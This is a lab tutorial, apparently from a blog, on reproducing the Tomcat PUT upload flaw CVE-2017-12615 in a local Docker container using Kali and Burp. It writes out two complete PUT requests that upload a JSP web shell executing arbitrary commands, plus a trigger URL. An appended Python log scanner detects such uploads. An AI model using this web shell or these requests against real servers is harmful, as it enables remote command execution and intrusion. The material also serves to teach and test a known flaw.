• Installing Kali and testing CVE-2017-12615


    1 Install Kali

    1.1 Download the VMware image

    kali-linux-2022.1
    The default username and password are both kali

    1.2 Initialize the system

    sudo apt update -y  #kali
    sudo apt install -y sogoupinyin fcitx
    sudo dpkg-reconfigure locales #tick [x] zh_CN.UTF-8 UTF-8
    sudo reboot
    

    1.3 Install Docker

    vim /etc/apt/sources.list.d/docker.list 
    deb [arch=amd64] https://download.docker.com/linux/debian buster stable
    
    sudo apt update -y 
    sudo apt install -y docker-ce
    

    1.4 Install docker-compose

    sudo apt install -y docker-compose
    

    2 Configure the Burp proxy

    2.1 Find Burp Suite under Applications
    2.2 Add a proxy listener under Proxy -> Options
    2.3 In the browser, add a proxy entry pointing at the listener Burp opened
    2.4 Import Burp's CA certificate into the browser

    3 Set up the CVE-2017-12615 environment

    sudo docker run -it -p 8080:8080 cved/cve-2017-12615 bash  #kali
    root@cac77cc04871:/usr/local/tomcat# bin/catalina.sh start
    #keep this window open for now
    

    4 Test

    First, visit the service in a browser

    firefox http://127.0.0.1:8080
    

    In Burp, open Proxy -> HTTP history and confirm that the proxy is seeing the traffic,
    then open Burp's Repeater and edit the request

    PUT /1.jsp::$DATA  HTTP/1.1
    Host: 192.168.144.128:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Length: 659

    <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
    -------------------------------------------------------------------------------------------------------
    PUT /2.jsp/ HTTP/1.1
    Host: 192.168.144.128:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Length: 664

    <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
    

    Send the request, then open

    http://127.0.0.1:8080/2.jsp?cmd=whoami&password=023  #if it worked, the system user is returned
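    As an added defender-side example (not part of the original post), the following Python scanner runs over constructed Tomcat access-log lines and flags PUT requests whose path resolves to a JSP once the trailing `/` and `::$DATA` suffix tricks used in the two requests above are stripped. The log lines, field names and thresholds are all made up for illustration.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat access-log lines in the default common format; not from a real server.
SAMPLE_ACCESS_LOG = """\
192.168.144.1 - - [12/May/2022:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 11156
192.168.144.1 - - [12/May/2022:10:01:09 +0800] "PUT /1.jsp::$DATA HTTP/1.1" 201 -
192.168.144.1 - - [12/May/2022:10:01:15 +0800] "PUT /2.jsp/ HTTP/1.1" 201 -
192.168.144.1 - - [12/May/2022:10:01:21 +0800] "PUT /upload/report.txt HTTP/1.1" 201 -
192.168.144.1 - - [12/May/2022:10:01:30 +0800] "PUT /3.jsp HTTP/1.1" 403 -
192.168.144.1 - - [12/May/2022:10:01:44 +0800] "GET /2.jsp?cmd=whoami&password=023 HTTP/1.1" 200 32
"""

# Pulls timestamp, method, request target and status out of one access-log line.
REQUEST_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize_target(target: str) -> str:
    """Reduce a request path to the file name Tomcat would actually write.

    A trailing '/' or an NTFS '::$DATA' suffix keeps the URL from matching the
    *.jsp servlet mapping, so the request reaches the DefaultServlet, yet the
    file lands on disk as plain .jsp. Undo both so the real target is visible.
    """
    path = unquote(target.split('?', 1)[0])   # drop query string, decode %xx
    path = path.rstrip('/')
    if path.lower().endswith('::$data'):
        path = path[:-len('::$data')]
    return path


def flag_jsp_put(line: str):
    """Return a finding dict for a PUT that writes a JSP, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m or m['method'] != 'PUT':
        return None
    path = normalize_target(m['target'])
    if not path.lower().endswith(('.jsp', '.jspx')):
        return None
    return {
        'ts': m['ts'],
        'target': m['target'],
        'written_as': path,
        'status': int(m['status']),
        'suffix_trick': path != m['target'],          # raw path hid the .jsp
        'created': m['status'] in ('201', '204'),     # DefaultServlet accepted the write
    }


def scan(log_text: str):
    """Scan every line and keep only the findings."""
    return [hit for hit in (flag_jsp_put(l) for l in log_text.splitlines()) if hit]
```

    A PUT that Tomcat answers with 201 means the DefaultServlet's `readonly` init-param in conf/web.xml was false; the default (true) is what closes this hole.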
    
  • Original URL: https://www.cnblogs.com/haozheyu/p/16249053.html
Copyright © 2020-2023  润新知